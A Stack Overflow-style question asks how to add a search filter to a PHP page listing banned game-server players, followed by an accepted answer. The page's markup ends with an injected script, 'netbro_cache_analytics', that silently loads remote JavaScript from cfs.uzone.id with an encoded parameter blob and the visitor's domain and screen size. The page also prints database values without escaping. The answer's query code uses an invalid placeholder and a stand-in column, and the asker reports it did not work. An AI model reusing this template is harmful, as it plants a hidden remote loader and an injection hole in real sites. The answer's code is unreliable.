# My page has a list of results from SQL, I want to filter the results by putting a search box

Tags: php, sql

```
<table class="table">
                        <thead>
                            <td><font color="#ff0000"><strong>Username</strong></font></td>
                            <td><font color="#ff0000"><strong>Player IP</strong></font></td>
                            <td><font color="#ff0000"><strong>Banned By</strong></font></td>
                            <td><font color="#ff0000"><strong>Reason</strong></font></td>
                        </thead>
                        <?php
                        $query = $config->prepare("SELECT player_banned, player_ip, banned_for, banned_by FROM `playerbans`");
                        $query->execute();
                        if($query->rowCount() == 0)
                        {
                            echo "<tr><td colspan='6'><small>There's no player on ban list</small></td></tr>";
                        }
                        while($data = $query->fetch())
                        {
                            echo "<tr><td>".$data['player_banned']."</td>";
                            echo "<td>".$data['player_ip']."</td>";
                            echo "<td>".$data['banned_by']."</td>";
                            echo "<td>".$data['banned_for']."</td></tr>";
                        }
                        ?>
```

Page

```
<?php
session_start();
include "config.php";

?>enter code here
<!doctype html>
<html lang='en'>
<head>
    <meta charset='utf-8'>
    <meta name='author' content='CodeZero Cops and Robbers'>
    <meta http-equiv='X-UA-Compatible' content='IE=edge,chrome=1'>
    <meta name='description' content='>Donate for the server, CZ Original Community'>
    <meta name='keywords' content='sfcnr, sf, czcnr, cnr, samp, gta sa, san andreas, san andreas multiplayer, cops and robbers, cnrsf, san fierro, los santos, samp server, sa:mp'>



            <title>Players Banned List &mdash; CodeZero Community</title>

    <meta name='viewport' content='width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no'>

    <meta name='HandheldFriendly' content='True'>
    <meta name='MobileOptimized' content='320'>
    <meta name='apple-mobile-web-app-capable' content='yes'>
    <meta content='IE=edge,chrome=1' http-equiv='X-UA-Compatible'>

    <link rel='icon' type='image/png' sizes='16x16' href='http://sf-cnr.com/assets/img/icons/favicon16.png'>
    <link rel='icon' type='image/png' sizes='32x32' href='http://sf-cnr.com/assets/img/icons/favicon32.png'>
    <link rel='icon' type='image/x-icon' href='http://sf-cnr.com/assets/img/icons/favicon.ico'>
    <link rel='shortcut icon' type='image/x-icon' href='http://sf-cnr.com/assets/img/icons/favicon.ico'>

    <link rel='stylesheet' crossorigin='anonymous' href='https://maxcdn.bootstrapcdn.com/bootswatch/3.3.7/paper/bootstrap.min.css' integrity='sha384-awusxf8AUojygHf2+joICySzB780jVvQaVCAt1clU3QsyAitLGul28Qxb2r1e5g+'>
    <link rel='stylesheet' href='http://sf-cnr.com/assets/css/czcnr.css'>
</head>

<body data-spy='scroll' data-target='#main-navbar' data-offset='200'>
    <!--[if lt IE 11]>
        <p class='browserupgrade'>You are using an <strong>outdated</strong> browser. Please <a href='http://browsehappy.com/'>upgrade your browser</a> to improve your experience.</p>
    <![endif]-->
    <header>
        <div class='navbar navbar-default' id='main-navbar'>
                <div class='navbar-header'>
                    <a href='/' class='navbar-brand'>
                        <img src='http://sf-cnr.com/assets/img/logo2.png' class='logomain img-responsive' alt='Coming Soon'>
                    </a>
                </div>

    </header>

    <div class="container">
        <div>
        <br>
        <br>
                    <table class="table">
                        <thead>
                            <td><font color="#ff0000"><strong>Username</strong></font></td>
                            <td><font color="#ff0000"><strong>Player IP</strong></font></td>
                            <td><font color="#ff0000"><strong>Banned By</strong></font></td>
                            <td><font color="#ff0000"><strong>Reason</strong></font></td>
                        </thead>
                        <?php
                        $query = $config->prepare("SELECT player_banned, player_ip, banned_for, banned_by FROM `playerbans`");
                        $query->execute();
                        if($query->rowCount() == 0)
                        {
                            echo "<tr><td colspan='6'><small>There's no player on ban list</small></td></tr>";
                        }
                        while($data = $query->fetch())
                        {
                            echo "<tr><td>".$data['player_banned']."</td>";
                            echo "<td>".$data['player_ip']."</td>";
                            echo "<td>".$data['banned_by']."</td>";
                            echo "<td>".$data['banned_for']."</td></tr>";
                        }
                        ?>
                    </table>

        </div>
    </div> <!-- /container -->

    <script type='text/javascript' src='https://cdn.jsdelivr.net/g/jquery@3.1.0,bootstrap@3.3.7,jquery.stacktable@1.0.0,pace@1.0.2,bootbox@4.4.0'></script>
    <script type='text/javascript' src='http://sf-cnr.com/assets/js/czcnr.js'></script>
    <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582H6x5iDAuv2BgmNFiBRmFhhZyQUvjNSjiB%2ftJP573bsnRCP5JczpdOSlguxHSRTFnEjUbFNkx%2fmKdBbbIS6t%2bA4Uo2DUgTLbqLKiqSoFsVnhRpuVyYzL4slrFdrTqRYF7d75uSqwzFTVh%2fNDDQNmc6lXF2AQrlHpYDOvtqAVZghZ30nMWRQCo5snc4k7A57qojCW6VGideuBSu6hP9pQfrZyAdpXmIf9emPm2Ym7kgkVOlX1gs7Dn3Dy8X7le0NtgeZtIj4UYf%2fqhYqHBqIRp%2fZZ7e9ZTPFrL%2bQ8Zg0gif%2fCaHvsVltFLj20Q8EFkveFFPRJEzNJfWyiipoGGmf3Zm2Mxd9gGmPgKvMQUze2LLsJ8JtGpGCUB8sxw8OI6SJc%2bXC4fFsG4tHKCgB9uNlJNxeItHiQYrpxrHHr1KKuw9tY2Cx%2fZfmEjtLpmFNBri1rYFiODuHLNqUF6C%2bmoDdLqURfbC6GgTXeV9QZ9dAA5BMpv2e0hG62FN6ThMR2GBOQWaRr%2bDqNXhBYfiiliAWxm8x2P%2f5orqA%2bgvL8I2w9%2fE8J" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
    </html>
```

This is the code for displaying results. I want to put a search/filter box on top of the page to filter results from this table, I dont know how to do it.

Answer (score 0, accepted):

You can post a string with your search box and check the user is post anything or not.

First add a input field and input submit button in your html. Then change your php code with this code

```
if(isset($_POST['inputName']) && !empty($_POST["inputName"]))
{
    $input = $_POST['inputName'];
    $query = $config->prepare("SELECT player_banned, player_ip, banned_for, banned_by FROM `playerbans` where condition= @condition");
    $query->bindParam('@condition', $input);
}
else 
{
    $query = $config->prepare("SELECT player_banned, player_ip, banned_for, banned_by FROM `playerbans`");
}
$query->execute();
if($query->rowCount() == 0)
{
    echo "<tr><td colspan='6'><small>There's no player on ban list</small></td></tr>";
}
while($data = $query->fetch())
{
    echo "<tr><td>".$data['player_banned']."</td>";
    echo "<td>".$data['player_ip']."</td>";
    echo "<td>".$data['banned_by']."</td>";
    echo "<td>".$data['banned_for']."</td></tr>";
}
```

Is it help you ?

Comment: did not quite help me but, thanks for trying to help :D, I used a different code with Script function to do it and it helped :D